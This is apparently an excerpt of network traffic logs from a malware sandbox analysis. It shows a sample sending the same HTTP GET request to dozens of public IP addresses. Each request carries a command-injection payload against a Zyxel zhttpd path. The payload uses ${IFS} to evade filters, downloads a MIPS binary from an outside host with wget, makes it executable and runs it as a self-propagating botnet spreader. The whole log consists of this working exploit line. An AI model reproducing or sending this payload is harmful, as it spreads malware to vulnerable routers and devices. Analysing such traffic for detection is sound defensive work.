                                            Feb 2, 2024 06:21:00.393127918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1238192.168.2.1551322128.176.85.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393167019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1239192.168.2.155490660.10.44.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393194914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1240192.168.2.1559550122.191.178.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393230915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1241192.168.2.1547656110.120.199.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393271923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1242192.168.2.155645841.130.171.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393306971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1243192.168.2.155910478.49.106.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393342972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1244192.168.2.154888088.161.103.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393379927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1245192.168.2.153319066.158.106.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393433094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1246192.168.2.153806648.20.186.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393460035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1247192.168.2.15607282.204.62.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393507957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1248192.168.2.1545948124.235.62.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393538952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1249192.168.2.155716059.226.13.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393584967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1250192.168.2.1533954142.149.66.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393615007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1251192.168.2.154311651.172.48.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393651962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1252192.168.2.1553270103.61.183.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393693924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1253192.168.2.154332832.63.128.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393733025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1254192.168.2.15590121.58.128.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393774986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1255192.168.2.155583479.231.28.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393824100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1256192.168.2.155729477.196.225.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393851995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1257192.168.2.1555326118.233.89.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393898964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1258192.168.2.154460663.202.129.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393899918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1259192.168.2.1543458159.131.235.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393922091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1260192.168.2.1559016132.160.248.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393955946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1261192.168.2.1553950158.174.68.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.393990993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1262192.168.2.154705473.129.201.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394042969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1263192.168.2.15548769.79.9.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394073963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1264192.168.2.1554784207.34.176.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394119024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1265192.168.2.153996631.18.11.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394161940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1266192.168.2.1551074134.146.105.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394182920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1267192.168.2.1553908180.97.14.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394201994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1268192.168.2.155798412.250.237.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394231081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1269192.168.2.155334093.20.105.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394272089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1270192.168.2.1553046216.160.152.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394304037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1271192.168.2.1542160103.56.246.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394351959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1272192.168.2.1538550134.150.15.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394395113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1273192.168.2.153485834.199.56.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394424915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1274192.168.2.1544992206.179.18.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394460917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1275192.168.2.155024820.21.196.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394490957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1276192.168.2.154036089.64.191.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394522905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1277192.168.2.1545180146.244.166.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394573927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1278192.168.2.1559722139.147.194.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394603968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1279192.168.2.1534244143.252.134.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394649029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1280192.168.2.155555258.139.17.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394680977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1281192.168.2.1554924118.120.154.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394717932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1282192.168.2.1548162157.32.50.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394774914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1283192.168.2.1555028159.243.251.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394784927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1284192.168.2.1553912201.255.21.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394835949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1285192.168.2.153409824.6.19.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394875050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1286192.168.2.1535012156.75.178.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394928932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1287192.168.2.155406696.212.220.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394946098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1288192.168.2.1560528136.124.136.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.394978046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1289192.168.2.1557786143.215.84.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395023108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1290192.168.2.1537482188.128.106.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395067930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1291192.168.2.1549246171.96.108.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395112991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1292192.168.2.153672012.65.134.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395155907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1293192.168.2.154761439.19.107.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395212889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1294192.168.2.155731686.31.38.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395234108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1295192.168.2.1552010118.170.252.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395272970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1296192.168.2.1558630114.134.19.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395320892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1297192.168.2.155256461.43.11.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395344019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1298192.168.2.1548864157.52.117.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395391941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1299192.168.2.153476040.255.7.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395416975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1300192.168.2.153986275.36.35.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395463943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1301192.168.2.1550008169.225.61.198443
                                            TimestampBytes transferredDirectionData
